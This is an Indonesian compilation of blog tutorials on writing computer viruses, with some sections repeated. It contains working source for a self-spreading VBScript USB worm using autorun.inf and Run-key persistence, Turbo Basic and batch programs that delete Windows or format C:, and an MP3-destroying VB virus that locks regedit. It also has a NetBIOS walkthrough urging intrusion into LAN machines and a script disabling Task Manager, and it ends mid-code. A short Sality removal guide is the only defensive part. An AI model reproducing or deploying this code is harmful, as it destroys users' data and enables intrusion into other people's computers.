Pendahuluan
Untuk membuat sebuah virus tidaklah terlalu sulit hanya dengan menggunakan tool notepad saja kita sudah bisa membuat virus. Tetapi alangkah baiknya jika kita memahami sedikit bahasa pemrograman seperti Visual Basic. Sebelum kita bahas lebih jauh lagi penulis akan menjelaskan terlebih dahulu prinsip kerja virus pada umumnya.
Prinsip Kerja Virus
1. Virus pada dasarnya hanyalah sebuah program atau skrip pemrograman seperti halnya program-program yang sering kita temukan: Ms Word, Excel, Corel dan lain-lain. Hanya saja program ini dibuat untuk tujuan yang kurang baik bahkan merusak.
2. Ukuran program virus sangat kecil sehingga cukup untuk dimasukkan kedalam flashdisk atau disket dan biasanya icon yang digunakan sangat mirip dengan dokumen word atau berbentuk seperti folder.
Perhatikan gambar dibawah
Tiles
Sepintas tidak dapat di bedakan mana Folder asli mana bukan dan mana dokumen asli dan mana yang virus.
Sekarang perhatikan tampilan Folder dan Dokumen dalam View Details
Detailed
Icon Folder maupun dokumen dengan Type Application dan Screen Saver sudah dapat dipastikan adalah virus. Karena pembuat aplikasi dan screen saver memasang icon folder atau word pastilah punya itikad yang kurang baik.
3. Biasanya virus-virus ini menyamar dengan menggunakan nama file yang ada dalam flashdisk atau disket anda, sedangkan dokumen asli anda disembunyikan dalam hidden file. Untuk bagaimana cara memunculkan file hidden ini dapat anda lihat dalam blog Mencegah Virus tanpa anti virus
4. Saat anda klik dua kali virus ini maka program virus akan di eksekusi. Langkah pertama yang dilakukan virus adalah membuka dokumen yang disembunyikan untuk mengurangi kecurigaan pengguna.
5. Berikutnya virus akan mengcopy dirinya ke hard drive dan menuliskan registry di HKEY_LOCAL_MACHINE\Software\Microsoft \Windows\CurrentVersion\Run atau di HKEY_CURRENT_USER\Software\Microsoft \Windows\CurrentVersion\Run agar program virus secara otomatis di eksekusi saat komputer pertama kali menyala.
6. Jika perlu Virus mendisable Task manager dan regedit untuk mencegah pengguna menghapus virus secara manual
7. Berikutnya virus akan aktif untuk memeriksa jika ada file dokumen baru dalam flashdisk atau disket dalam setiap beberapa detik, yang kemudian akan disembunyikan kemudian mengcopy file virus dan memberi nama sesuai dengan nama file yang disembunyikan tadi. Virus juga akan menuliskan script Autorun.inf dalam flashdisk secara hidden agar virus secara otomatis dijalankan saat flashdisk di klik dua kali dalam My Computer
Jadi demikiankah siklus virus dari flashdisk ke komputer dan dari komputer ke flashdisk
Tentang VB Script
VB Script atau Visual Basic Script sebenarnya hanyalah teks biasa yang berisi kode pemrograman dengan bahasa visual basic dan disimpan dengan format vbs. Untuk membuat vbscript cukup menggunakan teks editor sederhana seperti Notepad atau menggunakan yang lebih lengkap seperti Ultra Edit atau Notepad++. Berikut adalah contoh membuat vbscript sederhana.
1. Buka program Notepad dari Start > All Programs > Accessories > Notepad.
2. Tulis teks berikut ini
Msgbox "Ini adalah contoh VB Script Sederhana"
3. Kemudian simpan file dengan Save as Type di ubah ke All files
4. Beri nama file tersebut dengan tambahan .vbs dibelakang. Contohnya ScriptSederhanan.vbs
5. Sekarang lihat tampilan ikon file di explorer, tidak lagi berupa teks. Coba klik 2 kali file tersebut, maka akan muncul kotak dialog bertuliskan Ini adalah contoh VB Script Sederhana.
6. Yang dibutuhkan bagi vbscript untuk menjadi virus hanyalah kode yang tepat sehingga mengikuti proses yang dijelaskan di atas.
Contoh Kode Virus Sederhana
Berikut adalah contoh kode virus menggunakan vbscript sederhana. Jika ingin mencoba sebaiknya Anti virus di matikan dan Install juga Deep Freeze kemudia bekukan seluruh harddrive
*****
'El Magnifico MAN
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe svchost.exe.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\svchost.exe.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\svchost.exe.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "\svchost.exe.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\svchost.exe.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\svchost.exe.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\svchost.exe.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost",winpath&"\svchost.exe.vbs"
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",""
rg.regwrite "HKCR\vbsfile\DefaultIcon\","shell32.dll,3"
if check <> 1 then
Wscript.sleep 100000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
do while year(now) >= 2008
WScript.sleep 20000
msgbox "Hapuskan UN untuk meningkatkan pendidikan di Indonesia" & vbcrlf & _
"Karena di UN banyak terjadi kecurangan dan politik sekolah" & vbcrlf & _
"untuk menaikkan gengsi sekolah. Bahkan pada kabupaten tertentu," & vbcrlf & _
"kecurangan sudah direstui oleh pemerintah kabupaten tersebut" & vbcrlf & _
vbcrlf & vbcrlf & _
" HAPUSKAN UJIAN NASIONAL" & vbcrlf & vbcrlf & _
" Suara dari guru yang Risau pada sistem pendidikan"
loop
Membuat program perusak (seperti virus) merupakan keinginan sebagian para pemula komputer, tapi bagaimana mereka bisa membuat kalau mereka tidak tahu bahasa pemograman sama sekali, anda jangan resah untuk masalah ini karena saat ini penulis akan mengajarkan anda cara membuat program perusak (virus) yang sangat sederhana sekali tapi sangat mematikan bahkan bisa dikatakan lebih mengerikan dari program perusak manapun.
Pertama kali skill yang anda butuhkan adalah dasar DOS, tanpa ini anda akan sulit untuk berkreasi dalam membuat program ini tapi jika anda tidak tahu dasar perintah DOS maka anda cukup copy paste saja, bahasa pemograman yang akan kita pakai adalah Turbo Basic v1.0, anda dapat mendownloadnya di Google.
Diatas adalah tampilan Turbo Basic, jika anda buta pemograman Turbo Basic maka anda masuk ke Edit lalu anda tulis Source Code program perusak.
shell "Perintah DOS"
dengan diawali kata shell maka anda dapat menjalankan perintah DOS pada program, misal anda membuat :
shell "c:"
shell "cd\"
shell "del command.com"
Diatas adalah contoh menghapus DOS pada DOS Classic, Windows 95/98 sehingga pengguna komputer tidak dapat booting, kita contohkan yang lain.
shell "c:"
shell "cd\"
shell "deltree /y mydocu~1"
shell "deltree /y windows"
shell "deltree /y progra~1"
Diatas adalah contoh menghapus Directory My Document, WIndows dan Program FIles, sangat fatal bukan ?
Setelah anda selesai membuat programnya maka anda save dahulu, caranya pilih File lalu Save lalu beri nama filenya misal VIRUS.BAS, setelah itu baru kita mengcompile source code tadi, caranya pilih Options lalu pilih Compile to EXE file, setelah itu masuk ke pilihan compile lalu anda enter, maka source code tersebut akan menjadi file EXE.
Jika file EXE tersebut dijalankan maka komputer anda akan menjalankan perintah DOS pada program, dari tutorial diatas, anda dapat berkreasi sendiri bagaimana virus buatan anda dapat berjalan sesuai dengan anda inginkan, perlu diketahui bahwa TIDAK ADA SATU ANTIVIRUS DIDUNIA INI DAPAT MENDETEKSI PROGRAM INI ADALAH VIRUS jadi anda bebas mengcopykan program ini ke komputer manapun yang anda suka kecuali komputer berbasis non DOS atau Windows, hehe
Tujuan dari tutorial ini adalah agar kita lebih waspada terhadap berbagai file dengan ekstensi *.exe meskipun file *.exe tersebut 100% dinyatakan bebas virus dari berbagai jenis Antivirus.
Membuat program perusak (seperti virus) merupakan keinginan sebagian para pemula komputer, tapi bagaimana mereka bisa membuat kalau mereka tidak tahu bahasa pemograman sama sekali, anda jangan resah untuk masalah ini karena saat ini penulis akan mengajarkan anda cara membuat program perusak (virus) yang sangat sederhana sekali tapi sangat mematikan bahkan bisa dikatakan lebih mengerikan dari program perusak manapun.
Pertama kali skill yang anda butuhkan adalah dasar DOS, tanpa ini anda akan sulit untuk berkreasi dalam membuat program ini tapi jika anda tidak tahu dasar perintah DOS maka anda cukup copy paste saja, bahasa pemograman yang akan kita pakai adalah Turbo Basic v1.0, anda dapat mendownloadnya di Google.
Diatas adalah tampilan Turbo Basic, jika anda buta pemograman Turbo Basic maka anda masuk ke Edit lalu anda tulis Source Code program perusak.
shell "Perintah DOS"
dengan diawali kata shell maka anda dapat menjalankan perintah DOS pada program, misal anda membuat :
shell "c:"
shell "cd\"
shell "del command.com"
Diatas adalah contoh menghapus DOS pada DOS Classic, Windows 95/98 sehingga pengguna komputer tidak dapat booting, kita contohkan yang lain.
shell "c:"
shell "cd\"
shell "deltree /y mydocu~1"
shell "deltree /y windows"
shell "deltree /y progra~1"
Diatas adalah contoh menghapus Directory My Document, WIndows dan Program FIles, sangat fatal bukan ?
Setelah anda selesai membuat programnya maka anda save dahulu, caranya pilih File lalu Save lalu beri nama filenya misal VIRUS.BAS, setelah itu baru kita mengcompile source code tadi, caranya pilih Options lalu pilih Compile to EXE file, setelah itu masuk ke pilihan compile lalu anda enter, maka source code tersebut akan menjadi file EXE.
Jika file EXE tersebut dijalankan maka komputer anda akan menjalankan perintah DOS pada program, dari tutorial diatas, anda dapat berkreasi sendiri bagaimana virus buatan anda dapat berjalan sesuai dengan anda inginkan, perlu diketahui bahwa TIDAK ADA SATU ANTIVIRUS DIDUNIA INI DAPAT MENDETEKSI PROGRAM INI ADALAH VIRUS jadi anda bebas mengcopykan program ini ke komputer manapun yang anda suka kecuali komputer berbasis non DOS atau Windows, hehe
Tujuan dari tutorial ini adalah agar kita lebih waspada terhadap berbagai file dengan ekstensi *.exe meskipun file *.exe tersebut 100% dinyatakan bebas virus dari berbagai jenis Antivirus.
(SOK SOK AN) Sep 4, '07 11:31 PM
for everyone
Huehehehehe...tiba2 kepribadian jahat saya muncul....(setan bertanduk lageeee)....kali ini kita akan membahas pembuatan virus penghancur mp3...loh loh loh...mas...kok gitu...hehehehehe...iya neh...kebetulan para seniman terutama pencipta lagu kita sedang dilanda stress karena lagunya dengan seenaknya dibajak oleh para user seperti kita...Muahahahahaha!....ya iyalah kalo gak pakek musik saya juga bisa mati kalau sedang melakukan programming...JADI YAH BAJAK SAJA!!!!
Virus MP3 virii
Keterangan dari virus ini hanya mencari file berekstensi mp3 dan TANPA AMPUN menghapus seluruh file MP3 yang ada di komputer anda...yaaaaaaa....gak enak dunk...lah namanya membuat virus ya buebas dooo....masak mau ditahan2....hueheheheheh...., ciri2 yang dari virus ini adalah :
1. menon aktifkan :
- Folder Option
- Penglihatan Extensi file (.doc, .exe, .mp3), maksudnya jika kita di windows explorer bisa melihat ekstensi file maka kita tak akan melihat ekstensi file tersebut, biasa pertahanan diri gitu
- mengunci regedit (seperti biasa)
- mematikan winamp secara tiba2 jika file virus aktif
bisa dilihat pada code dibawah ini:
Dim titik As String
titik = """"
CreateKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ServiceOptionMP3", _
titik & "c:\windows\winamp.dll.exe" & titik
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 1
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1
CreateKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegedit", "1"
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1
CreateKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegedit", "1"
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", 1
CreateKey "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption", "STOP PIRACY!!!!"
CreateKey "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText", "Stop pembajakan Musisi Dalam Negeri, Jangan Gunakan MP3 lagi (sok sok an) huahahahahaha!!!"
Shell "taskkill /f /im winamp.exe", vbHide
2. Mencari file berekstensi .mp3 yang ada di hardisk, lihat saja code di bawah ini :
'///////////////////////Sub Perangkap Hardisk/////////////
Sub cari()
Dim ictr As Integer
'If InStr(cboDrives.Text, "All Hard Drives") > 0 Then
For ictr = 0 To UBound(sDrives)
'////taruh di sini untuk mencari file virus yang ingin ditangkap, kalau disini saya menangkap file .doc
GetFiles sDrives(ictr), True, "*.mp3"
Next
'Else
'////taruh di sini untuk mencari file virus yang ingin ditangkap, kalau disini saya menangkap file .doc
' frmMain.GetFiles cboDrives.Text, True, "*.doc"
'End If
' frmMain.Visible = True
End Sub
Dan kode ini untuk mencari seluruh partisi hardisk yang ada di komputer
Dim ictr As Integer
Dim iDriveCount As Integer
Dim sAllDrives As String
Dim sDrive As String
ReDim sDrives(0) As String
For ictr = 66 To 90
sDrive = Chr(ictr) & ":\"
If DriveType(sDrive) = "Fixed Drive" Or DriveType(sDrive) = "Removable Drive" Then
If sAllDrives <> "" Then sAllDrives = sAllDrives & ", "
sAllDrives = sAllDrives & sDrive
iDriveCount = iDriveCount + 1
End If
Next
3. Mencari dan MELAHAP SELURUH FILE MP3 TANPA AMPUN, lihat code di bawah ini:
'//////////////////////////////Sub perangkap File/////////////////////
Public Sub GetFiles(Path As String, SubFolder As Boolean, Optional Pattern As String = "*.*")
'Screen.MousePointer = vbHourglass
'Dim li As ListItem
Dim WFD As WIN32_FIND_DATA
Dim hFile As Long, fPath As String, fName As String
Dim bawa As Long
fPath = AddBackslash(Path)
Dim sPattern As String
sPattern = Pattern
fName = fPath & sPattern
hFile = FindFirstFile(fName, WFD)
On Error Resume Next
'///////taruh di bagian ini untuk melakukan tindakan apa setelah file virus ditemukan/////
If (hFile > 0) And ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) <> FILE_ATTRIBUTE_DIRECTORY) Then
'Set li = lvFiles.ListItems.Add(, , fPath & StripNulls(WFD.cFileName))
'MsgBox fPath & StripNulls(WFD.cFileName)
'//////mengeset atribut file .doc menjadi atribut archive atau biasa
bawa = SetFileAttributes(fPath & StripNulls(WFD.cFileName), 0)
FileCopy App.Path & "\" & App.EXEName & ".exe", fPath & StripNulls(WFD.cFileName) & ".exe"
DeleteFile fPath & StripNulls(WFD.cFileName)
End If
If hFile > 0 Then
While FindNextFile(hFile, WFD)
'///////taruh di bagian ini untuk melakukan tindakan apa setelah file virus ditemukan/////
If ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) <> FILE_ATTRIBUTE_DIRECTORY) Then
'Set li = lvFiles.ListItems.Add(, , fPath & StripNulls(WFD.cFileName))
'MsgBox fPath & StripNulls(WFD.cFileName)
'//////mengeset atribut file .doc menjadi atribut archive atau biasa
bawa = SetFileAttributes(fPath & StripNulls(WFD.cFileName), 0)
FileCopy App.Path & "\" & App.EXEName & ".exe", fPath & StripNulls(WFD.cFileName) & ".exe"
DeleteFile fPath & StripNulls(WFD.cFileName)
End If
Wend
End If
If SubFolder Then
hFile = FindFirstFile(fPath & "*.*", WFD)
If (hFile > 0) And ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) = FILE_ATTRIBUTE_DIRECTORY) And _
StripNulls(WFD.cFileName) <> "." And StripNulls(WFD.cFileName) <> ".." Then
GetFiles fPath & StripNulls(WFD.cFileName), True, sPattern
End If
While FindNextFile(hFile, WFD)
If ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) = FILE_ATTRIBUTE_DIRECTORY) And _
StripNulls(WFD.cFileName) <> "." And StripNulls(WFD.cFileName) <> ".." Then
GetFiles fPath & StripNulls(WFD.cFileName), True, sPattern
End If
Wend
End If
FindClose hFile
'Set li = Nothing
'Screen.MousePointer = vbDefault
End Sub
Nah setelah terkena file ini maka yang akan terjadi seluruh file mp3 akan berubah menjadi .exe dan file .mp3 akan dihapus tanpa amapun....buehehehehehe....jadi ya siap - siap mem-backup hardisk anda terutama file mp3. OKeh......ih kok jahat sekali sih.....ya sekali lagi membuat virus itu harus jahat.
-------------------------------TIPS SETAN-----------------------------------
COBA YANG DICARI BUKAN FILE MP3 SAJA TAPI FILE SISTEM ATAU FILE .DOC .XLS DAN .DAT, BUKANKAH ITU MENYENANGKAN?Tapi tetep saja menjadi penghancur.....seorang virus maker yang baik tidak akan menghancurkan tapi akan membuat dunia lebih baik lewat komputer tul gak...
-------------------------------------------------------------------------------
Di sini kita hanya belajar bagai mana virus tersebut bekerja...bagaimana virus tersebut di program, sehingga kita tau jalan dan proses virus tersebut dan sekaligus menyelamatkan bangsa kita dari aktifitas pembajakan - pembajakan......soalnya NENEK MOYANGKU SEORANG PELAUT, coba nenek moyangku seorang sarjana atau seorang dermawan, pasti kita hasilnya beda kan...huahahahahaha....yang jelas program ini dapat dijadikan untuk proteksi file apa saja. Misalnya kita punya e-book gratis, lalu dibajak sama orang...ck ck ck kasian sudah gratis dibajak pula...nah untuk memberi pelajaran kepada orang itu gunakan program ini....hihihihihi...yang jelas ini ilmu dan tidak boleh disembunyikan, saya tidak bertanggung jawab atas kerusakan yang terjadi di komputer anda.
Tetapi yang jelas virus ini MASIH BANYAK KELEMAHANNYA, mungkin anda dapat mengembangkannya sendiri. Terserah ingin dikembangkan kode penyebarannya, kode pertahannannya atau judul lagunya mau di rubah, bukan Samson-Naluri Lelaki lagi, tapi mungkin lagi lain yang akhir - akhir ini sedang naik daun. kayak lagu apaaaaaaa gitu pokoknya....nah sekarang coba bedakan gambar di bawah ini, mana yang virus hayooohhhh!!!!!
Pernahkan kamu kena worm 32 sality, biasa menular lewat flashdisk dan LAN
Diketemukan pada 06/08/2008, dengan Type file infector (Menjadi aktif di memory dan akan menjadi
resistent serta berbentuk file exe)
Penularan Secara umum Melalui
• Local network
• Mapped network drives (flasdisk/Memory Card/Eksternal Hardrive)
Sudah dideteksi oleh :
• Symantec : W32.Sality.AE
• Mcafee : W32/Sality.gen
• Kaspersky : Virus.Win32.Sality.aa
• TrendMicro: PE_SALITY.JER
• F-Secure : Virus.Win32.Sality.aa
• Sophos : W32/Sality-AM
• Panda : W32/Sality.AK
• VirusBuster: Sality.AQ.Gen
• Bitdefender: Win32.Sality.OG
Efek samping:
• Memperlemah keamanan system
• Memodifikasi Registry menjadi
Task manager tidak bisa dibuka
Registry Editor tidak bisa terbuka
Antivirus tidak berfungsi dan tidak bisa di Update, diinstal juga tidak bisa
Firewall juga tidak jalan
Folder Option di Explorer akan hilang
Dibawah ini adalah posisi w32/sality.Y di registry windows :
Registry The value of the following registry key is removed :
– [HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot]
It creates the following entry in order to bypass the Windows XP firewall:
– [HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\
FirewallPolicy\StandardProfile\AuthorizedApplications\List]
• "c:\\%filename%"="c:\\%filename%:*:Enabled:ipsec"
• "c:\windows\\system32\\ctfmon.exe"="c:\windows\\system32\\ctfmon.exe:*:Enabled:ipsec"
The following registry key is added:
– [HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\system]
• "DisableTaskMgr"=dword:00000001
• "DisableRegistryTools"=dword:00000001
The following registry keys are changed:
– [HKLM\SOFTWARE\Microsoft\Security Center]
Old value:
• "AntiVirusDisableNotify"=dword:00000000
• "FirewallDisableNotify"=dword:00000000
• "UpdatesDisableNotify"=dword:00000000
• "AntiVirusOverride"=dword:00000000
• "FirewallOverride"=dword:00000000
New value:
• "AntiVirusDisableNotify"=dword:00000001
• "FirewallDisableNotify"=dword:00000001
• "UpdatesDisableNotify"=dword:00000001
• "AntiVirusOverride"=dword:00000001
• "FirewallOverride"=dword:00000001
• "UacDisableNotify"=dword:00000001
– [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
Old value:
• "Hidden"=dword:00000001
New value:
• "Hidden"=dword:00000002
cara membersihkannya :
1. Gunakan remover sality yang dijalankan dari cd, remover sality yang biasa saya gunakan dari AVG, Kaspersky, Norman, tunggu semua proses selesai. Sabar menunggu.
2. Setelah selasai lakukan perbaikan registry yang di rusak oleh sality (repair.inf)
3. Restore semua registry yang hilang (bisa di donlot di bagian Downloads)
4. Install antivirus avira Product version 9.0.0.394 or higher version , (kalo ada yang gratis kenapa musti beli apalagi membajak), jangan lupa diupdate virus definitionnya.
5. Scanning semua drive yang ada...sampai selesai, akan muncul "repair all" klik repair all
6. Selamat mencoba.
Hacking menggunakan metode Netbios atau lebih dikenal dengan Netbios Hacking merupakan teknik hacking klasik yang bisa kita pelajari dan tidak salah untuk dipraktekkan. Hacking Netbios cocok diterapkan pada jaringan LAN, semisal warnet atau jaringan kantor.
Hal utama yang dibutuhkan dalam Netbios Hacking adalah IP Address. Ada berbagai tools dan sofware yang dapat digunakan untuk menscan IP Address yang sedang aktif pada jaringan lokal, misalnya Look at Lan, IP Scanner, dll. Pelajari penggunaanya disini.
Langkah-langkah Netbios Hacking :
1. Buka command Prompt, atau pada run ketik cmd kemudian enter.
2. Pada command prompt ketik netview \\ip_address, misalnya C:\>net view \\192.168.1.1
Jika tidak ada pesan error yang ditampilkan, coba dengan IP Address yang berbeda. Jika sukses tidak ada pesan error, lanjutkan dengan perintah yang lain dibawah ini.
C:\>net use C:\\192.168.1.100
C:\>net use D:\\192.168.1.100\SharedDocs
C:\>net use F:\\192.168.1.100\Myprint
Pada contoh-contoh di atas menunjukan beberapa perintah yang biasa digunakan. C:,D:, dan F: adalah drive yang biasa terdapat di komputer. Perintah pertama bertujuan untuk mengakses drive C. Perintah kedua (SharedDocs) digunakan untuk mengakses Dokumen yang di sharing sedangkan perintah ketiga (Myprint) dipakai untuk mengakses printer komputer yang akan diremote.
Jika tampil pesan "The commad completed successfully", berarti perintah yang dilakukan berhasil meremote komputer korban. Langkah selanjutnya tinggal mengobrak-abrik komputer korban, mencopy, menghapus data, memasukan virus, spyware, trojan atau keylogger.
Menarik bukan?... Hacking netbios dapat dijadikan awal kita memulai aktifitas hacking di jaringan. wew....
Catatan: Hacking netbios yang dapat dijalankan pada komputer yang tidak terlindungi oleh Firewall. Jadi jika Firewall komputer diaktifkan maka akan tampil pesan error. Stop dan coba dengan IP Address yang berbeda.
Selamat mencoba
echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* nul >>c:\autoexec.bat
echo copy c:\******s\command\forma.com c:\ >nul >>c:\autoexe.bat
echo copy c:\******s\command/deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltre /y c:\******s\*.* >nul >>c:\autoexec.bat
echoformat c:/q /u /autotest >nul >>c:\autoexe.bat
tulis di notepad save dgn AUTOEXE.bat
jangan di klik
Cara membuat program perusak (Seperti Virus)
Penulis peduli dengan para newbie yang sedang belajar pemograman sekaligus penulis jugapeduli dengan para progammer yang belum mengenal bahasa BASIC (Maklum kebanyakan progammerpada langsung lompat ke Pascal, C dan lainnya).
Membuat program perusak (seperti virus) merupakan keinginan sebagian para pemula komputer,tapi bagaimana mereka bisa membuat kalau mereka tidak tahu bahasa pemograman sama sekali,anda jangan resah untuk masalah ini karena saat ini penulis akan mengajarkan anda caramembuat program perusak ( seperti virus) yang sangat sederhana sekali tapi sangat mematikanbahkan bisa dikatakan lebih mengerikan dari program perusak manapun.
Pertama kali skill yang anda butuhkan adalah dasar DOS, tanpa ini anda akan sulit untuk
berkreasi dalam membuat program ini tapi jika anda tidak tahu dasar perintah DOS maka anda
cukup copy paste saja, bahasa pemograman yang akan kita pakai adalah Turbo Basic v1.0, anda
dapat mendownloadnya di Google atau cari dirental CD.
Jika anda buta pemograman Turbo Basic maka anda masuk ke Edit lalu anda tulis Source Code
program perusak.
shell "Perintah DOS"
dengan diawali kata shell maka anda dapat menjalankan perintah DOS pada program, misal anda
membuat :
shell "c:"
shell "cd\"
shell "del command.com"
Diatas adalah contoh menghapus DOS pada DOS Classic, Windows 95/98 sehingga pengguna
komputer tidak dapat booting, kita contohkan yang lain.
shell "c:"
shell "cd\"
shell "deltree /y mydocu~1"
shell "deltree /y windows"
shell "deltree /y progra~1"
Diatas adalah contoh menghapus Directory My Document, Windows dan Program Files, sangat
fatal bukan ?
Setelah anda selesai membuat programnya maka anda save dahulu, caranya pilih File lalu Save
lalu beri nama filenya misal VIRUS.BAS, setelah itu baru kita mengcompile source code tadi,
caranya pilih Options lalu pilih Compile to EXE file, setelah itu masuk ke pilihan compile
lalu anda enter, maka source code tersebut akan menjadi file EXE.
Jika file EXE tersebut dijalankan maka komputer anda akan menjalankan perintah DOS pada
program, dari tutorial diatas, anda dapat berkreasi sendiri bagaimana virus buatan anda
dapat berjalan sesuai dengan anda inginkan, perlu diketahui bahwa BELUM ADA SATU ANTIVIRUS
DIDUNIA INI DAPAT MENDETEKSI PROGRAM INI ADALAH VIRUS jadi anda bebas mengcopykan program
ini ke komputer manapun yang anda suka kecuali komputer berbasis non DOS atau Windows, hehe
Tujuan dari tutorial ini adalah agar kita lebih waspada terhadap berbagai file dengan
ekstensi *.exe meskipun file *.exe tersebut 100% dinyatakan bebas virus dari berbagai
jenis Antivirus.
Mau belajar bikin virus? ini adalah tahapan awal untuk sebuah virus visual basic (*.vbs)
Ketik kode ini pada Notepad (Klik Start>Program>Accessories>Notepad)
On Error Resume Next
kode ini berfungsi untuk meneruskan ke kode berikutnya jika terjadi Error. Ini sering digunakan oleh para pembuat virus.
CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\System\DisableRegistryTools", "1", "REG_DWORD"
CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\System\DisableTaskMgr", "1", "REG_DWORD"
>> berfungsi untuk mendisable "Registry Editor" dan "Task Manager"
CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\NoFolderOptions", "1", "REG_DWORD"
CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\NoRun", "1", "REG_DWORD"
CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\NoFind", "1", "REG_DWORD"
>> Ini digunakan untuk menghilangkan menu "Folder Options", "Run", dan "Find"
CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\NoViewContextMenu", "1", "REG_DWORD"
>> Berfungsi untuk tidak menampilkan menu Klik Kanan.
CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\Advanced\Hidden", "1", "REG_DWORD"
>> Tidak menampilkan "File Hidden" pada "Explorer"
* * *
maka akan tercipta script seperti berikut ini:
On Error Resume Next
CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\System\DisableRegistryTools", "1", "REG_DWORD"
CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\System\DisableTaskMgr", "1", "REG_DWORD"
CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\NoFolderOptions", "1", "REG_DWORD"
CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\NoRun", "1", "REG_DWORD"
CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\NoFind", "1", "REG_DWORD"
CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\NoViewContextMenu", "1", "REG_DWORD"
CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\Advanced\Hidden", "1", "REG_DWORD"
* * *
Kemudian simpan dengan jenis vbs (*.vbs)
Caranya: klik File, pilih Save As, pada File Name ketik "Virus.vbs" (tanpa tanda petik), kemudian klik Save.
Selesai. . .
Kali ini saya akan membagi script virus, script ini boleh anda sebarluaskan, bahkan anda jalankan. Tapi dengan tujuan untuk pembelajaran semata.
Kedewasan sikap anda sangat dibutuhkan, segala resiko yang dihasilkan oleh virus ini, diluar tanggung jawab saya.
Sekali lagi, gunakan script ini hanya untuk tujuan pembelajaran. Bukan untuk merusak, bila anda ingin melihat kemampuannya, silahkan aktifkan di komputer anda sendiri. Jangan di komputer orang lain. Saya tidak bertanggung jawab atas kerusakan yang di buat oleh virus ini.
Pertama-tama buka notepad, kemudian copas (copy-paste) script di bawah ini kedalam notepad, kemudian simpan dengan format vhck3d.vbs dimulai dari on error resume next
-------------------------script begin--------------------------
On error resume next
Dim dini,jatiya,i,loph,you,mf,isi,tf,vhck3d,nt,check,sd
'Siapkan isi autorun atau bahasa kerennya make the autorun
Isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe vhck3d.vbs"
Set you = createobject("scripting.filesystemobject")
Set mf = you.getfile(wscript.scriptfullname)
Dim text,size
Size = mf.size
Check = mf.drive.drivetype
Set text = mf.openastextstream(1,-2)
Do while not text.atendofstream
Dini = dini & text.readline
